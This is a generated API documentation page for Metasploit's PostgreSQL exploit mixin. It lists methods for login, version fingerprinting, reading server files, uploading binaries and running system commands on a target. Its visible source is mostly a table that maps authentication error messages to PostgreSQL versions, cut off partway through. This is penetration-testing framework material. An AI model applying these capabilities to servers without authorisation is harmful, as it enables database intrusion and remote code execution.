adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/Postgres.html
T

3061 lines
157 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::Postgres
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::Postgres";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (P)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">Postgres</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::Postgres
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd>Db::PostgresPR, <span class='object_link'><a href="Tcp.html" title="Msf::Exploit::Remote::Tcp (module)">Tcp</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/postgres.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module exposes methods for querying a remote PostgreSQL service.</p>
</div>
</div>
<div class="tags">
</div>
<h2>Instance Attribute Summary <small><a href="#" class="summary_toggle">collapse</a></small></h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#postgres_conn-instance_method" title="#postgres_conn (instance method)">#<strong>postgres_conn</strong> &#x21d2; ::Msf::Db::PostgresPR::Connection </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="Tcp.html" title="Msf::Exploit::Remote::Tcp (module)">Tcp</a></span></h3>
<p class="inherited"><span class='object_link'><a href="Tcp.html#sock-instance_method" title="Msf::Exploit::Remote::Tcp#sock (method)">#sock</a></span></p>
<h2>
Datastore accessors
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#database-instance_method" title="#database (instance method)">#<strong>database</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Return the datastore value of the same name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#password-instance_method" title="#password (instance method)">#<strong>password</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Return the datastore value of the same name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#rhost-instance_method" title="#rhost (instance method)">#<strong>rhost</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Return the datastore value of the same name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#rport-instance_method" title="#rport (instance method)">#<strong>rport</strong> &#x21d2; Integer </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Return the datastore value of the same name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#username-instance_method" title="#username (instance method)">#<strong>username</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Return the datastore value of the same name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#verbose-instance_method" title="#verbose (instance method)">#<strong>verbose</strong> &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Return the datastore value of the same name.</p>
</div></span>
</li>
</ul>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#analyze_auth_error-instance_method" title="#analyze_auth_error (instance method)">#<strong>analyze_auth_error</strong>(e) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Matches up filename, line number, and routine with a version.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Creates an instance of a PostgreSQL exploit module.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_authed_fingerprint-instance_method" title="#postgres_authed_fingerprint (instance method)">#<strong>postgres_authed_fingerprint</strong> &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Ask the server what its version is.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_base64_data-instance_method" title="#postgres_base64_data (instance method)">#<strong>postgres_base64_data</strong>(data) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Converts data to base64 with no newlines.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_base64_file-instance_method" title="#postgres_base64_file (instance method)">#<strong>postgres_base64_file</strong>(fname) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Calls <span class='object_link'><a href="#postgres_base64_data-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_base64_data (method)">#postgres_base64_data</a></span> with the contents of file <code>fname</code>.</p>
</div></span>
</li>
<li class="public deprecated">
<span class="summary_signature">
<a href="#postgres_create_stager_table-instance_method" title="#postgres_create_stager_table (instance method)">#<strong>postgres_create_stager_table</strong> &#x21d2; Object </a>
</span>
<span class="deprecated note title">deprecated</span>
<span class="summary_desc"><strong>Deprecated.</strong> <div class='inline'>
<p>No longer necessary since we can insert base64 data directly</p>
</div></span>
</li>
<li class="public deprecated">
<span class="summary_signature">
<a href="#postgres_create_sys_exec-instance_method" title="#postgres_create_sys_exec (instance method)">#<strong>postgres_create_sys_exec</strong>(dll) &#x21d2; Object </a>
</span>
<span class="deprecated note title">deprecated</span>
<span class="summary_desc"><strong>Deprecated.</strong> <div class='inline'>
<p>Just get a real shell instead</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_fingerprint-instance_method" title="#postgres_fingerprint (instance method)">#<strong>postgres_fingerprint</strong>(args = {}) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Attempts to fingerprint a remote PostgreSQL instance, inferring version number from the failed authentication messages or simply returning the result of “select version()” if authentication was successful.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_has_database_privilege-instance_method" title="#postgres_has_database_privilege (instance method)">#<strong>postgres_has_database_privilege</strong>(priv) &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Whether the current user has privilege <code>priv</code> on the current database.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_login-instance_method" title="#postgres_login (instance method)">#<strong>postgres_login</strong>(opts = {}) &#x21d2; :error_database, ... </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Takes a number of arguments (defaults to the datastore for appropriate values), and will either populate <span class='object_link'><a href="#postgres_conn-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_conn (method)">#postgres_conn</a></span> and return <code>:connected</code>, or will return <code>:error</code>, <code>:error_databse</code>, or <code>:error_credentials</code> in case of an error.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_logout-instance_method" title="#postgres_logout (instance method)">#<strong>postgres_logout</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Logs out of a database instance and sets <span class='object_link'><a href="#postgres_conn-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_conn (method)">#postgres_conn</a></span> to nil.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_password-instance_method" title="#postgres_password (instance method)">#<strong>postgres_password</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The password as provided by the user or a random one if none has been given.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_print_reply-instance_method" title="#postgres_print_reply (instance method)">#<strong>postgres_print_reply</strong>(resp = nil, sql = nil) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>If resp is not actually a Connection::Result object, then return :error (but not an actual Exception, thats up to the caller. Otherwise, create a rowset using Rex::Text::Table (if theres more than 0 rows) and return :complete..</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_query-instance_method" title="#postgres_query (instance method)">#<strong>postgres_query</strong>(sql = nil, doprint = false) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>If not currently connected, attempt to connect.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_read_textfile-instance_method" title="#postgres_read_textfile (instance method)">#<strong>postgres_read_textfile</strong>(filename) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>This presumes the user has rights to both the file and to create a table.</p>
</div></span>
</li>
<li class="public deprecated">
<span class="summary_signature">
<a href="#postgres_sys_exec-instance_method" title="#postgres_sys_exec (instance method)">#<strong>postgres_sys_exec</strong>(cmd) &#x21d2; Object </a>
</span>
<span class="deprecated note title">deprecated</span>
<span class="summary_desc"><strong>Deprecated.</strong> <div class='inline'>
<p>Just get a real shell instead</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_upload_binary_data-instance_method" title="#postgres_upload_binary_data (instance method)">#<strong>postgres_upload_binary_data</strong>(data, remote_fname = nil) &#x21d2; nil, String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Writes data to disk on the target server.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#postgres_upload_binary_file-instance_method" title="#postgres_upload_binary_file (instance method)">#<strong>postgres_upload_binary_file</strong>(fname, remote_fname = nil) &#x21d2; nil, String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Uploads the given local file to the remote server.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="Tcp.html" title="Msf::Exploit::Remote::Tcp (module)">Tcp</a></span></h3>
<p class="inherited"><span class='object_link'><a href="Tcp.html#chost-instance_method" title="Msf::Exploit::Remote::Tcp#chost (method)">#chost</a></span>, <span class='object_link'><a href="Tcp.html#cleanup-instance_method" title="Msf::Exploit::Remote::Tcp#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="Tcp.html#connect-instance_method" title="Msf::Exploit::Remote::Tcp#connect (method)">#connect</a></span>, <span class='object_link'><a href="Tcp.html#connect_timeout-instance_method" title="Msf::Exploit::Remote::Tcp#connect_timeout (method)">#connect_timeout</a></span>, <span class='object_link'><a href="Tcp.html#cport-instance_method" title="Msf::Exploit::Remote::Tcp#cport (method)">#cport</a></span>, <span class='object_link'><a href="Tcp.html#disconnect-instance_method" title="Msf::Exploit::Remote::Tcp#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="Tcp.html#handler-instance_method" title="Msf::Exploit::Remote::Tcp#handler (method)">#handler</a></span>, <span class='object_link'><a href="Tcp.html#lhost-instance_method" title="Msf::Exploit::Remote::Tcp#lhost (method)">#lhost</a></span>, <span class='object_link'><a href="Tcp.html#lport-instance_method" title="Msf::Exploit::Remote::Tcp#lport (method)">#lport</a></span>, <span class='object_link'><a href="Tcp.html#peer-instance_method" title="Msf::Exploit::Remote::Tcp#peer (method)">#peer</a></span>, <span class='object_link'><a href="Tcp.html#print_prefix-instance_method" title="Msf::Exploit::Remote::Tcp#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="Tcp.html#proxies-instance_method" title="Msf::Exploit::Remote::Tcp#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="Tcp.html#replicant-instance_method" title="Msf::Exploit::Remote::Tcp#replicant (method)">#replicant</a></span>, <span class='object_link'><a href="Tcp.html#set_tcp_evasions-instance_method" title="Msf::Exploit::Remote::Tcp#set_tcp_evasions (method)">#set_tcp_evasions</a></span>, <span class='object_link'><a href="Tcp.html#shutdown-instance_method" title="Msf::Exploit::Remote::Tcp#shutdown (method)">#shutdown</a></span>, <span class='object_link'><a href="Tcp.html#ssl-instance_method" title="Msf::Exploit::Remote::Tcp#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="Tcp.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="Tcp.html#ssl_verify_mode-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_verify_mode (method)">#ssl_verify_mode</a></span>, <span class='object_link'><a href="Tcp.html#ssl_version-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="Tcp.html#sslkeylogfile-instance_method" title="Msf::Exploit::Remote::Tcp#sslkeylogfile (method)">#sslkeylogfile</a></span></p>
<div id="instance_attr_details" class="attr_details">
<h2>Instance Attribute Details</h2>
<span id="postgres_conn=-instance_method"></span>
<div class="method_details first">
<h3 class="signature first" id="postgres_conn-instance_method">
#<strong>postgres_conn</strong> &#x21d2; <tt>::Msf::Db::PostgresPR::Connection</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>::Msf::Db::PostgresPR::Connection</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
21
22
23</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 21</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='ivar'>@postgres_conn</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="analyze_auth_error-instance_method">
#<strong>analyze_auth_error</strong>(e) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Matches up filename, line number, and routine with a version. These all come from source builds of Postgres. TODO: check in on the binary distros, see if theyre different.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>e</span>
<span class='type'>(<tt>RuntimeError</tt>)</span>
&mdash;
<div class='inline'>
<p>The exception raised by Connection.new</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash containing the version in one of the keys :preauth, :auth, or :unknown, depending on how it was determined</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#postgres_fingerprint-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_fingerprint (method)">#postgres_fingerprint</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 264</span>
<span class='kw'>def</span> <span class='id identifier rubyid_analyze_auth_error'>analyze_auth_error</span><span class='lparen'>(</span><span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_fname'>fname</span><span class='comma'>,</span><span class='id identifier rubyid_fline'>fline</span><span class='comma'>,</span><span class='id identifier rubyid_froutine'>froutine</span> <span class='op'>=</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\t</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>3</span><span class='comma'>,</span><span class='int'>3</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_fingerprint'>fingerprint</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fname'>fname</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fline'>fline</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_froutine'>froutine</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>case</span> <span class='id identifier rubyid_fingerprint'>fingerprint</span>
<span class='comment'># Usually, Postgres is on Linux, so let&#39;s use that as a baseline.
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L395:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>7.4.26-27</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L264:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>7.4.26-27</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L452:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>7.4.26-27</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good, but not allowed due to pg_hba.conf)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L400:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.0.22-23</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L274:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.0.22-23</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L457:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.0.22-23</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L337:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.1.18-19</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L354:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.1.18-19</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L394:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.1.18-19</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L414:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.2.7-1</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials) ubuntu 8.04.2
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L362:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.2.14-15</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L319:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.2.14-15</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L419:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.2.14-15</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L1003:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.3.8</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L388:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.3.8-9</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L1060:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.3.8</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L1017:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.3.9</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L1074:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.3.9</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good, but not allowed due to pg_hba.conf)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L258:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.1</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fpostinit.c:L422:RInitPostgres</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.1-2</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, good credentials)
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L349:RClientAuthentication</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.1</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Rejected (maybe good)
</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Fauth.c:L273:Rauth_failed</span><span class='tstring_end'>&quot;</span></span> <span class='semicolon'>;</span> <span class='kw'>return</span> <span class='lbrace'>{</span><span class='symbol'>:preauth</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>8.4.2</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='comment'># Failed (bad db, bad credentials)
